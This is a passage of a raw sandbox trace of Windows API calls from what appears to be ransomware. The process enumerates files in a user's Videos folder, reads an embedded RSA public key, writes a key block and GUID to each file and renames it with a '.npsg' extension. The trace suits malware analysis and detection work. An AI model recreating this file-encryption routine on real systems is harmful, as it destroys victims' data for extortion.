ftLastWriteTime.dwHighDateTime=0x1d5b9a7, nFileSizeHigh=0x0, nFileSizeLow=0x16e15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dT3UJ3u2edMm2nKZ9ZQ.swf", cAlternateFileName="DT3UJ3~1.SWF")) returned 1 [0238.669] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\dT3UJ3u2edMm2nKZ9ZQ.swf") returned=".swf" [0238.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\dT3UJ3u2edMm2nKZ9ZQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\dt3uj3u2edmm2nkz9zq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.669] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=93717) returned 1 [0238.669] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.672] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16def, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.672] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.675] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16e15, lpOverlapped=0x0) returned 1 [0238.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.676] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.676] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.677] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.677] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.677] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.677] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.677] GetLastError () returned 0x0 [0238.677] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.678] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.678] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.678] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.678] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.678] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.679] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16e15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.679] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.679] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.680] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.680] CloseHandle (hObject=0x644) returned 1 [0238.682] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\dT3UJ3u2edMm2nKZ9ZQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\dt3uj3u2edmm2nkz9zq.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\dT3UJ3u2edMm2nKZ9ZQ.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\dt3uj3u2edmm2nkz9zq.swf.npsg")) returned 1 [0238.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.683] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.684] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9889740, ftCreationTime.dwHighDateTime=0x1d5c30f, ftLastAccessTime.dwLowDateTime=0x161f1630, ftLastAccessTime.dwHighDateTime=0x1d5ba25, ftLastWriteTime.dwLowDateTime=0x161f1630, ftLastWriteTime.dwHighDateTime=0x1d5ba25, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oMoJTci", cAlternateFileName="")) returned 1 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a550 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x3b90810 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a2a8 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a4c8 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a330 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e858 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e7c0 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8fa18 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a198 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a000 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fa90 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f838 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a660 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6794d8 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f8b0 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a088 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83ce8 | out: hHeap=0x620000) returned 1 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a550 | out: hHeap=0x620000) returned 1 [0238.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.685] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23e8ab00, ftCreationTime.dwHighDateTime=0x1d5c19b, ftLastAccessTime.dwLowDateTime=0x3d8fb780, ftLastAccessTime.dwHighDateTime=0x1d5ba4b, ftLastWriteTime.dwLowDateTime=0x3d8fb780, ftLastWriteTime.dwHighDateTime=0x1d5ba4b, nFileSizeHigh=0x0, nFileSizeLow=0x2644, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wp1we_L6jDY.mkv", cAlternateFileName="WP1WE_~1.MKV")) returned 1 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f8b0 [0238.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f8b0 | out: hHeap=0x620000) returned 1 [0238.686] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\Wp1we_L6jDY.mkv") returned=".mkv" [0238.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\Wp1we_L6jDY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kyk5k01vvlqpw\\wp1we_l6jdy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.686] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=9796) returned 1 [0238.686] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.689] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x261e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.689] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.691] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.691] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2644, lpOverlapped=0x0) returned 1 [0238.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.692] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.692] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.693] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.693] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.693] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.693] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.694] GetLastError () returned 0x0 [0238.694] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.694] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.694] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.694] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.694] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2640) returned 0x3b88cd0 [0238.694] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b860d8 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b30 [0238.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86120 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b48 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b78 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b90 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.695] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400b90 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400b78 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b90 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400b78 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bd8 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.696] GetCurrentThreadId () returned 0x5b4 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b873a8 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.697] GetCurrentThreadId () returned 0x5b4 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bd8 [0238.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.697] 